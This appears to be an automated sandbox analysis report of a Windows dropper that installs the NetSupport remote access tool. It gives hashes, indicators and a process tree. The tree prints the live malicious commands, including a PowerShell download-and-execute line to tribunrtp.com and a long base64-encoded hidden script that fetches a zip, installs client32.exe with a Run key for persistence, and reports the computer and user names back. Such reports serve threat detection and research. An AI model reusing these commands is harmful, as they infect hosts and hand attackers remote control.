Analysis
-
max time kernel
102s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
16/04/2025, 01:18
Static task
static1
Behavioral task
behavioral1
Sample
5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe
Resource
win11-20250410-en
General
-
Target
5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe
-
Size
28KB
-
MD5
665aba35929da6cccc28ee3462c46187
-
SHA1
d8b04407b2807f0fc078e6bd47b6ed4a71d0b16b
-
SHA256
5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8
-
SHA512
19e132a5b23bebe4795af6a57e7958267565f18c7a83419d02bfad26ca222ddbec4479f7270e0a96612adfb470a51d9622354938a554db33360b45e03eb37b62
-
SSDEEP
384:pZs2bjAkOzFGbIki9U2ZPrgghNPe6ki2kUix6LkCzHDH/n/RJGBkSFX:pyi9oZkirZPrg2RB2Ex64CzHDHf/ckg
Malware Config
Extracted
https://tribunrtp.com/bytest/bytest.zip
https://tribunrtp.com/byfil/
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Netsupport family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 18 4568 powershell.exe 22 4896 powershell.exe 29 4896 powershell.exe -
Downloads MZ/PE file 9 IoCs
flow pid Process 28 4828 Process not Found 28 4828 Process not Found 28 4828 Process not Found 28 4828 Process not Found 28 4828 Process not Found 28 4828 Process not Found 28 4828 Process not Found 28 4828 Process not Found 28 4828 Process not Found -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GDriveClient = "C:\\Users\\Admin\\AppData\\Roaming\\GDriveClient\\client32.exe" powershell.exe -
pid Process 4568 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client32.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 4568 powershell.exe 4568 powershell.exe 4896 powershell.exe 4896 powershell.exe 4896 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4568 powershell.exe Token: SeDebugPrivilege 4896 powershell.exe Token: SeSecurityPrivilege 1424 client32.exe Token: SeSecurityPrivilege 1548 client32.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1548 client32.exe 1424 client32.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 5584 wrote to memory of 2680 5584 5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe 92 PID 5584 wrote to memory of 2680 5584 5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe 92 PID 5584 wrote to memory of 4808 5584 5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe 94 PID 5584 wrote to memory of 4808 5584 5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe 94 PID 4808 wrote to memory of 4568 4808 cmd.exe 96 PID 4808 wrote to memory of 4568 4808 cmd.exe 96 PID 4568 wrote to memory of 4896 4568 powershell.exe 99 PID 4568 wrote to memory of 4896 4568 powershell.exe 99 PID 4896 wrote to memory of 1424 4896 powershell.exe 101 PID 4896 wrote to memory of 1424 4896 powershell.exe 101 PID 4896 wrote to memory of 1424 4896 powershell.exe 101 PID 6128 wrote to memory of 1548 6128 cmd.exe 104 PID 6128 wrote to memory of 1548 6128 cmd.exe 104 PID 6128 wrote to memory of 1548 6128 cmd.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe"C:\Users\Admin\AppData\Local\Temp\5342fa80b4f8f983322e8932819ef6037f837b93719a77f06f48d4a6eb7b17f8.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5584 -
C:\Windows\System32\cmd.exe/c "del %TEMP%\JavaFilee && echo eXDGeso3s9932k > %TEMP%\JavaFilee"2⤵PID:2680
-
-
C:\Windows\System32\cmd.exe/c "powershell.exe $u='https://tribunrtp.com/come.php?compName='+$env:computername;[NEt.seRviCePOINtMAnaGeR]::SECurityprotOCol = [Net.seCuRityPrOTOcOLTYpe]::TLS12;iex(iwr $u -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/541.36 (KHTML, like Gecko) Chrome/122.108.1.10 Safari/541.36').Content;"2⤵
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe $u='https://tribunrtp.com/come.php?compName='+$env:computername;[NEt.seRviCePOINtMAnaGeR]::SECurityprotOCol = [Net.seCuRityPrOTOcOLTYpe]::TLS12;iex(iwr $u -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/541.36 (KHTML, like Gecko) Chrome/122.108.1.10 Safari/541.36').Content;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noproFI -eXEcUtiOnP Bypass -winDowst HiDD -EnCO JABuAEoAcAA4AFoARAA9ACcARwBEAHIAaQB2AGUAQwBsAGkAZQBuAHQAJwA7ACAAJABDADQAMQA2AG8AZAA9AGcARQBUAC0AQwBPAG0ATQBBAE4ARAAgAFMAdABBAHIAVAAtAGIASQBUAFMAVABSAGEATgBzAEYARQBSACAALQBlAHIAUgBPAFIAYQBjAHQAaQBPAE4AIABTAGkAbABFAG4AdABMAFkAQwBPAG4AVABJAE4AVQBlADsAIABbAE4ARQB0AC4AcwBlAFIAdgBpAEMAZQBQAE8ASQBOAHQATQBBAG4AYQBHAGUAUgBdADoAOgBTAEUAQwB1AHIAaQB0AHkAcAByAG8AdABPAEMAbwBsACAAPQAgAFsATgBlAHQALgBzAGUAQwB1AFIAaQB0AHkAUAByAE8AVABPAGMATwBMAFQAWQBwAGUAXQA6ADoAVABMAFMAMQAyADsAIAAkAEcAQQBJAFUARABVAD0AJwBoAHQAdABwAHMAOgAvAC8AdAByAGkAYgB1AG4AcgB0AHAALgBjAG8AbQAvAGIAeQB0AGUAcwB0AC8AYgB5AHQAZQBzAHQALgB6AGkAcAAnADsAIABDAGgAZABpAFIAIAAkAEUATgBWADoAYQBwAHAAZABhAFQAYQA7ACAAJAB2AEIAegBrAEoAZAA5AD0AJABFAG4AdgA6AEEAcABQAEQAQQBUAGEALAAgACQAbgBKAHAAOABaAEQAIAAtAEoATwBJAE4AIAAnAFwAJwA7ACAAdABSAHkAIAB7ACAAbgBpACAALQBQAGEAVABIACAAJABFAE4AVgA6AGEAUABwAGQAQQB0AEEAIAAtAE4AQQBNAEUAIAAkAG4ASgBwADgAWgBEACAALQBJAFQAZQBtAFQAeQBwAEUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgAEEARABEAC0AVABZAHAAZQAgAC0AQQBzAFMARQBtAEIATAB5AG4AYQBtAEUAIABzAFkAUwB0AEUAbQAuAEkAbwAuAGMATwBtAHAAUgBlAHMAUwBpAE8ATgAsACAAUwBZAHMAdABFAE0ALgBpAE8ALgBjAE8ATQBQAFIAZQBzAHMAaQBvAG4ALgBmAGkAbABFAHMAeQBzAFQAZQBtACAALQBlAHIAUgBvAFIAQQBjAHQAaQBvAG4AIABTAEkATABFAG4AdABsAHkAYwBPAG4AdABJAE4AdQBFADsAIAAkAGcAYQBrAGYAVgAzADgASwA9ACgAQwBVAFIATAAgAC0AVQBSAGkAIAAkAEcAQQBJAFUARABVACAALQBVAFMARQBCAEEAcwBJAGMAUABBAFIAUwBpAE4ARwApAC4AQwBvAE4AVABlAG4AVAA7ACAAJABJAHgAcQBCAHkAQQBxAEIAPQBOAEUAVwAtAE8AQgBKAEUAYwBUACAAcwB5AHMAdABlAG0ALgBJAG8ALgBtAEUAbQBPAHIAWQBTAFQAUgBlAGEATQA7ACAAJABJAHgAcQBCAHkAQQBxAEIALgB3AHIASQB0AGUAKAAkAGcAYQBrAGYAVgAzADgASwAsACAAMAAsACAAJABnAGEAawBmAFYAMwA4AEsALgBsAGUATgBHAHQASAApADsAIAAkAEkAeABxAEIAeQBBAHEAQgAuAFMAZQBFAGsAKAAwACwAIABbAFMAWQBzAHQAZQBNAC4AaQBPAC4AcwBFAEUASwBPAFIASQBHAGkATgBdADoAOgBiAGUAZwBpAG4AKQAgAHwAIABvAHUAVAAtAE4AdQBMAEwAOwAgACQAVgBuAE4ATgBIAEoAagA4AD0ATgBlAHcALQBvAEIASgBlAEMAVAAgAHMAWQBzAHQAZQBtAC4AaQBPAC4AYwBvAE0AcABSAGUAUwBTAEkAbwBOAC4AegBpAHAAYQBSAGMASABpAHYAZQAoACQASQB4AHEAQgB5AEEAcQBCACwAIABbAFMAWQBTAHQAZQBtAC4ASQBvAC4AYwBvAG0AcAByAGUAcwBzAEkATwBOAC4AWgBJAFAAQQBSAGMAaABJAFYARQBNAG8ARABFAF0AOgA6AFIARQBhAGQAKQA7ACAARgBvAHIARQBBAEMAaAAoACQAagB3AEUAZQBYAEcAIABpAG4AIAAkAFYAbgBOAE4ASABKAGoAOAAuAGUAbgBUAHIASQBFAFMAKQAgAHsAIAAkAE8AVgBBADYAWQAyAGkATgA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJAB2AEIAegBrAEoAZAA5ACwAIAAkAGoAdwBFAGUAWABHAC4ATgBhAG0ARQA7ACAAJABhAEgAQQAyAFIAeAA5AE0APQAkAGoAdwBFAGUAWABHAC4ATwBQAGUAbgAoACkAOwAgACQAQQBZAEUARAB1AEIARQBSAD0AWwBzAHkAUwB0AGUATQAuAGkATwAuAGYASQBsAEUAXQA6ADoAQwByAEUAYQB0AGUAKAAkAE8AVgBBADYAWQAyAGkATgApADsAIAAkAGEASABBADIAUgB4ADkATQAuAEMATwBwAHkAdABPACgAJABBAFkARQBEAHUAQgBFAFIAKQA7ACAAJABBAFkARQBEAHUAQgBFAFIALgBDAGwATwBzAGUAKAApADsAIAAkAGEASABBADIAUgB4ADkATQAuAEMAbABvAFMAZQAoACkAOwB9ACAAJABWAG4ATgBOAEgASgBqADgALgBEAEkAUwBwAG8AUwBlACgAKQA7ACAAJABJAHgAcQBCAHkAQQBxAEIALgBkAGkAcwBwAG8AcwBlACgAKQA7ACAAfQAgAGMAYQB0AGMAaAAgAHsAJABQAEoAVwBWAFgAMQA9AEAAKAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcASABUAEMAVABMADMAMgAuAEQATABMACcALAAgACcAUABDAEkAQwBMADMAMgAuAEQATABMACcALAAgACcAQQB1AGQAaQBvAEMAYQBwAHQAdQByAGUALgBkAGwAbAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAHIAZQBtAGMAbQBkAHMAdAB1AGIALgBlAHgAZQAnACwAIAAnAHAAYwBpAGMAYQBwAGkALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAE4AUwBNAC4ATABJAEMAJwAsACAAJwBQAEMASQBDAEgARQBLAC4ARABMAEwAJwAsACAAJwBtAHMAdgBjAHIAMQAwADAALgBkAGwAbAAnACkAOwAgAG4AaQAgAC0AcABhAHQASAAgACQAZQBOAHYAOgBBAFAAUABEAGEAdABBACAALQBOAEEATQBlACAAJABuAEoAcAA4AFoARAAgAC0AaQB0AEUATQB0AFkAUABlACAAJwBkAGkAcgBlAGMAdABvAHIAeQAnADsAIAAkAFEAegBoAE4AeAAxAHAAbQA9ACcAaAB0AHQAcABzADoALwAvAHQAcgBpAGIAdQBuAHIAdABwAC4AYwBvAG0ALwBiAHkAZgBpAGwALwAnADsAIABpAEYAIAAoACQAQwA0ADEANgBvAGQAKQAgAHsAIAAkAFAASgBXAFYAWAAxACAAfAAgAEYATwBSAEUAYQBDAEgALQBvAGIAagBlAEMAVAAgAHsAIAAkAEoAcQBXAGMAdwB1AD0AJABRAHoAaABOAHgAMQBwAG0AKwAkAF8AOwAgACQAOQA2AHUAOAB5AEoAWQA4AD0AJAB2AEIAegBrAEoAZAA5ACsAJwBcACcAKwAkAF8AOwAgAFMAVABBAFIAVAAtAGIASQBUAHMAdAByAEEATgBTAGYAZQByACAALQBzAG8AVQBSAGMAZQAgACQASgBxAFcAYwB3AHUAIAAtAEQAZQBTAHQASQBOAEEAdABpAE8AbgAgACQAOQA2AHUAOAB5AEoAWQA4ADsAIAB9ADsAfQAgAEUATABzAEUAIAB7ACAAJABQAEoAVwBWAFgAMQAgAHwAIABmAG8AcgBlAEEAQwBoAC0ATwBCAGoARQBDAFQAIAB7ACAAJABKAHEAVwBjAHcAdQA9ACQAUQB6AGgATgB4ADEAcABtACsAJABfADsAIAAkADkANgB1ADgAeQBKAFkAOAA9ACQAdgBCAHoAawBKAGQAOQArACcAXAAnACsAJABfADsAIAAkAGEAWABVAEwAZgAwAE8AbgA9ACIAYgBpAHQAcwBBAGQAbQBpAG4ALgBlAFgAZQAgAC8AVABSAEEAbgBTAEYAZQByACAAVQBHADQASQBHAGoAbAA0ACAALwBkAE8AdwBuAEwATwBhAGQAIAAvAHAAUgBJAG8AUgBpAFQAWQAgAG4ATwBSAE0AQQBsACAAJABKAHEAVwBjAHcAdQAgACQAOQA2AHUAOAB5AEoAWQA4ACIAOwAgACYAIAAkAGEAWABVAEwAZgAwAE8AbgA7AH0AOwAgAH0AOwAgAH0AOwAgACQARgBwAHMAbABUADQAZgBuAD0ARwBpACAAJAB2AEIAegBrAEoAZAA5ACAALQBGAG8AUgBDAEUAOwAgACQARgBwAHMAbABUADQAZgBuAC4AYQBUAFQAcgBpAEIAdQB0AEUAcwA9ACcASABpAGQAZABlAG4AJwA7ACAAYwBkACAAJAB2AEIAegBrAEoAZAA5ADsAIAAkAHEAawBRAEIAbABmAFAAPQAkAHYAQgB6AGsASgBkADkAKwAnAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwA7ACAAcwB0AEEAcgB0AC0AcABSAG8AYwBlAHMAcwAgAGMAbABJAGUAbgB0ADMAMgAuAEUAeABlADsAIABuAEUAdwAtAEkAdABFAG0AcAByAG8AUABlAFIAVABZACAALQBQAEEAdABIACAAJwBIAEsAQwBVADoAXABzAG8AZgBUAFcAQQBSAGUAXABNAEkAQwBSAG8AcwBvAGYAVABcAFcASQBuAGQAbwB3AFMAXABjAFUAcgBSAEUAbgBUAHYARQByAHMAaQBvAG4AXAByAHUATgAnACAALQBOAEEATQBlACAAJABuAEoAcAA4AFoARAAgAC0AdgBhAEwAdQBFACAAJABxAGsAUQBCAGwAZgBQACAALQBwAFIAbwBwAEUAUgBUAFkAVAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7ACAAJABUADcAYgB6AD0AZwBFAHQALQBwAHIATwBDAEUAcwBzACAAYwBsAGkAZQBuAHQAMwAyACAALQBlAHIAUgBPAFIAYQBjAFQAaQBPAE4AIABTAGkATABlAG4AdABMAHkAYwBvAE4AdABJAG4AdQBFADsAIAAkAEkATQByAGwAPQAiAGgAdAB0AHAAcwA6AC8ALwB0AHIAaQBiAHUAbgByAHQAcAAuAGMAbwBtAC8AYwBvAHMAdABhAC8AZABlAGQAbwAuAHAAaABwAD8AYwBwAG4AbQBlAD0AJABlAG4AVgA6AEMATwBtAFAAdQBUAEUAcgBOAGEAbQBlACYAdQBzAG4AbQBlAD0AJABlAE4AVgA6AFUAUwBlAFIATgBhAG0AZQAmAHAAYQByAGEAbQA9ACIAOwAgAEkARgAgACgAJABUADcAYgB6AC4AaQBkACkAIAB7ACAAJABCAHMAVgBsADIAPQAkAEkATQByAGwAKwAnADkAbgA2AHYARQAnADsAIABjAFUAUgBsACAAJABCAHMAVgBsADIAIAAtAFUAcwBlAEIAYQBTAEkAYwBwAEEAcgBzAEkATgBnADsAfQAgAGUAbABTAGUAIAB7ACAAJABCAHMAVgBsADIAPQAkAEkATQByAGwAKwAnAG0AaQAyAFEARAAnADsAIABjAFUAUgBsACAAJABCAHMAVgBsADIAIAAtAHUAcwBlAGIAQQBTAGkAYwBQAEEAcgBTAGkAbgBnADsAfQA7AA==4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Users\Admin\AppData\Roaming\GDriveClient\client32.exe"C:\Users\Admin\AppData\Roaming\GDriveClient\client32.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1424
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\GDriveClient\client32.exe1⤵
- Suspicious use of WriteProcessMemory
PID:6128 -
C:\Users\Admin\AppData\Roaming\GDriveClient\client32.exeC:\Users\Admin\AppData\Roaming\GDriveClient\client32.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1548
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5e5ab5d093e49058a43f45f317b401e68
SHA1120da069a87aa9507d2b66c07e368753d3061c2d
SHA2564ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74
SHA512d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a
-
Filesize
1KB
MD535ccaae937127f2a74739de9db6f04f5
SHA10c4422023fdb04474621f5c552161fdfd10640b9
SHA256b9ca188f99ed047787006025dc0ec78c3d1286a9c3a8eb65ff19be6e426bb3af
SHA512a016e161bbc69516633bd9696db470cf690477983a9f2a8cd76e37598a201a34e48477a6be84d2884f5ab3307ce21e937e8b01e0f1d71b6be7b9fdb30ceab363
-
Filesize
17B
MD5f7f72191324a0bdaac7c154b3ef71c92
SHA19140004207888ba3d5d41816fd090f79ef28779f
SHA25640aea0ced08da69d5dd510cdda764cc6c6e7b173bec00e8475107fad7be21e93
SHA51289474f70263577c778ec3cf84054fb2cf9f605ed7cbe51a1ca4a86226ca3418eafdeca2a601aeb1bd5f41714d14233b9def401e7f7255e2d195c4ff21edd9d11
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82